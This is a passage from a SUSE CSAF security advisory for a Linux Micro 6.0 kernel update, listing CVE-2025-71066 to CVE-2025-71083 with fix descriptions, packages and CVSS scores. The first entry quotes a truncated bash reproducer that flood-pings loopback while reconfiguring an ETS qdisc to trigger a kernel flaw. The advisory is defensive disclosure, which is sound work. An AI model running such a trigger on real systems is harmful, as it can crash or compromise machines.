was sent by zdi-disclosures@trendmicro.com)\n\n```\nDEV=\"${DEV:-lo}\"\nROOT_HANDLE=\"${ROOT_HANDLE:-1:}\"\nBAND2_HANDLE=\"${BAND2_HANDLE:-20:}\" # child under 1:2\nPING_BYTES=\"${PING_BYTES:-48}\"\nPING_COUNT=\"${PING_COUNT:-200000}\"\nPING_DST=\"${PING_DST:-127.0.0.1}\"\n\nSLOW_TBF_RATE=\"${SLOW_TBF_RATE:-8bit}\"\nSLOW_TBF_BURST=\"${SLOW_TBF_BURST:-100b}\"\nSLOW_TBF_LAT=\"${SLOW_TBF_LAT:-1s}\"\n\ncleanup() {\n tc qdisc del dev \"$DEV\" root 2\u003e/dev/null\n}\ntrap cleanup EXIT\n\nip link set \"$DEV\" up\n\ntc qdisc del dev \"$DEV\" root 2\u003e/dev/null || true\n\ntc qdisc add dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\n\ntc qdisc add dev \"$DEV\" parent 1:2 handle \"$BAND2_HANDLE\" \\\n tbf rate \"$SLOW_TBF_RATE\" burst \"$SLOW_TBF_BURST\" latency \"$SLOW_TBF_LAT\"\n\ntc filter add dev \"$DEV\" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2\ntc -s qdisc ls dev $DEV\n\nping -I \"$DEV\" -f -c \"$PING_COUNT\" -s \"$PING_BYTES\" -W 0.001 \"$PING_DST\" \\\n \u003e/dev/null 2\u003e\u00261 \u0026\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 0\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\ntc -s qdisc ls dev $DEV\ntc qdisc del dev \"$DEV\" parent \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71066",
"url": "https://www.suse.com/security/cve/CVE-2025-71066"
},
{
"category": "external",
"summary": "SUSE Bug 1256645 for CVE-2025-71066",
"url": "https://bugzilla.suse.com/1256645"
},
{
"category": "external",
"summary": "SUSE Bug 1258005 for CVE-2025-71066",
"url": "https://bugzilla.suse.com/1258005"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2025-71066"
},
{
"cve": "CVE-2025-71077",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71077"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntpm: Cap the number of PCR banks\n\ntpm2_get_pcr_allocation() does not cap any upper limit for the number of\nbanks. Cap the limit to eight banks so that out of bounds values coming\nfrom external I/O cause on only limited harm.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71077",
"url": "https://www.suse.com/security/cve/CVE-2025-71077"
},
{
"category": "external",
"summary": "SUSE Bug 1256613 for CVE-2025-71077",
"url": "https://bugzilla.suse.com/1256613"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71077"
},
{
"cve": "CVE-2025-71078",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71078"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/64s/slb: Fix SLB multihit issue during SLB preload\n\nOn systems using the hash MMU, there is a software SLB preload cache that\nmirrors the entries loaded into the hardware SLB buffer. This preload\ncache is subject to periodic eviction - typically after every 256 context\nswitches - to remove old entry.\n\nTo optimize performance, the kernel skips switch_mmu_context() in\nswitch_mm_irqs_off() when the prev and next mm_struct are the same.\nHowever, on hash MMU systems, this can lead to inconsistencies between\nthe hardware SLB and the software preload cache.\n\nIf an SLB entry for a process is evicted from the software cache on one\nCPU, and the same process later runs on another CPU without executing\nswitch_mmu_context(), the hardware SLB may retain stale entries. If the\nkernel then attempts to reload that entry, it can trigger an SLB\nmulti-hit error.\n\nThe following timeline shows how stale SLB entries are created and can\ncause a multi-hit error when a process moves between CPUs without a\nMMU context switch.\n\nCPU 0 CPU 1\n----- -----\nProcess P\nexec swapper/1\n load_elf_binary\n begin_new_exc\n activate_mm\n switch_mm_irqs_off\n switch_mmu_context\n switch_slb\n /*\n * This invalidates all\n * the entries in the HW\n * and setup the new HW\n * SLB entries as per the\n * preload cache.\n */\ncontext_switch\nsched_migrate_task migrates process P to cpu-1\n\nProcess swapper/0 context switch (to process P)\n(uses mm_struct of Process P) switch_mm_irqs_off()\n switch_slb\n load_slb++\n /*\n * load_slb becomes 0 here\n * and we evict an entry from\n * the preload cache with\n * preload_age(). We still\n * keep HW SLB and preload\n * cache in sync, that is\n * because all HW SLB entries\n * anyways gets evicted in\n * switch_slb during SLBIA.\n * We then only add those\n * entries back in HW SLB,\n * which are currently\n * present in preload_cache\n * (after eviction).\n */\n load_elf_binary continues...\n setup_new_exec()\n slb_setup_new_exec()\n\n sched_switch event\n sched_migrate_task migrates\n process P to cpu-0\n\ncontext_switch from swapper/0 to Process P\n switch_mm_irqs_off()\n /*\n * Since both prev and next mm struct are same we don\u0027t call\n * switch_mmu_context(). This will cause the HW SLB and SW preload\n * cache to go out of sync in preload_new_slb_context. Because there\n * was an SLB entry which was evicted from both HW and preload cache\n * on cpu-1. Now later in preload_new_slb_context(), when we will try\n * to add the same preload entry again, we will add this to the SW\n * preload cache and then will add it to the HW SLB. Since on cpu-0\n * this entry was never invalidated, hence adding this entry to the HW\n * SLB will cause a SLB multi-hit error.\n */\nload_elf_binary cont\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71078",
"url": "https://www.suse.com/security/cve/CVE-2025-71078"
},
{
"category": "external",
"summary": "SUSE Bug 1256616 for CVE-2025-71078",
"url": "https://bugzilla.suse.com/1256616"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71078"
},
{
"cve": "CVE-2025-71079",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71079"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: nfc: fix deadlock between nfc_unregister_device and rfkill_fop_write\n\nA deadlock can occur between nfc_unregister_device() and rfkill_fop_write()\ndue to lock ordering inversion between device_lock and rfkill_global_mutex.\n\nThe problematic lock order is:\n\nThread A (rfkill_fop_write):\n rfkill_fop_write()\n mutex_lock(\u0026rfkill_global_mutex)\n rfkill_set_block()\n nfc_rfkill_set_block()\n nfc_dev_down()\n device_lock(\u0026dev-\u003edev) \u003c- waits for device_lock\n\nThread B (nfc_unregister_device):\n nfc_unregister_device()\n device_lock(\u0026dev-\u003edev)\n rfkill_unregister()\n mutex_lock(\u0026rfkill_global_mutex) \u003c- waits for rfkill_global_mutex\n\nThis creates a classic ABBA deadlock scenario.\n\nFix this by moving rfkill_unregister() and rfkill_destroy() outside the\ndevice_lock critical section. Store the rfkill pointer in a local variable\nbefore releasing the lock, then call rfkill_unregister() after releasing\ndevice_lock.\n\nThis change is safe because rfkill_fop_write() holds rfkill_global_mutex\nwhile calling the rfkill callbacks, and rfkill_unregister() also acquires\nrfkill_global_mutex before cleanup. Therefore, rfkill_unregister() will\nwait for any ongoing callback to complete before proceeding, and\ndevice_del() is only called after rfkill_unregister() returns, preventing\nany use-after-free.\n\nThe similar lock ordering in nfc_register_device() (device_lock -\u003e\nrfkill_global_mutex via rfkill_register) is safe because during\nregistration the device is not yet in rfkill_list, so no concurrent\nrfkill operations can occur on this device.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71079",
"url": "https://www.suse.com/security/cve/CVE-2025-71079"
},
{
"category": "external",
"summary": "SUSE Bug 1256619 for CVE-2025-71079",
"url": "https://bugzilla.suse.com/1256619"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71079"
},
{
"cve": "CVE-2025-71081",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71081"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: stm32: sai: fix OF node leak on probe\n\nThe reference taken to the sync provider OF node when probing the\nplatform device is currently only dropped if the set_sync() callback\nfails during DAI probe.\n\nMake sure to drop the reference on platform probe failures (e.g. probe\ndeferral) and on driver unbind.\n\nThis also avoids a potential use-after-free in case the DAI is ever\nreprobed without first rebinding the platform driver.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71081",
"url": "https://www.suse.com/security/cve/CVE-2025-71081"
},
{
"category": "external",
"summary": "SUSE Bug 1256609 for CVE-2025-71081",
"url": "https://bugzilla.suse.com/1256609"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71081"
},
{
"cve": "CVE-2025-71082",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71082"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: btusb: revert use of devm_kzalloc in btusb\n\nThis reverts commit 98921dbd00c4e (\"Bluetooth: Use devm_kzalloc in\nbtusb.c file\").\n\nIn btusb_probe(), we use devm_kzalloc() to allocate the btusb data. This\nties the lifetime of all the btusb data to the binding of a driver to\none interface, INTF. In a driver that binds to other interfaces, ISOC\nand DIAG, this is an accident waiting to happen.\n\nThe issue is revealed in btusb_disconnect(), where calling\nusb_driver_release_interface(\u0026btusb_driver, data-\u003eintf) will have devm\nfree the data that is also being used by the other interfaces of the\ndriver that may not be released yet.\n\nTo fix this, revert the use of devm and go back to freeing memory\nexplicitly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71082",
"url": "https://www.suse.com/security/cve/CVE-2025-71082"
},
{
"category": "external",
"summary": "SUSE Bug 1256611 for CVE-2025-71082",
"url": "https://bugzilla.suse.com/1256611"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71082"
},
{
"cve": "CVE-2025-71083",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71083"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/ttm: Avoid NULL pointer deref for evicted BOs\n\nIt is possible for a BO to exist that is not currently associated with a\nresource, e.g. because it has been evicted.\n\nWhen devcoredump tries to read the contents of all BOs for dumping, we need\nto expect this as well -- in this case, ENODATA is recorded instead of the\nbuffer contents.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
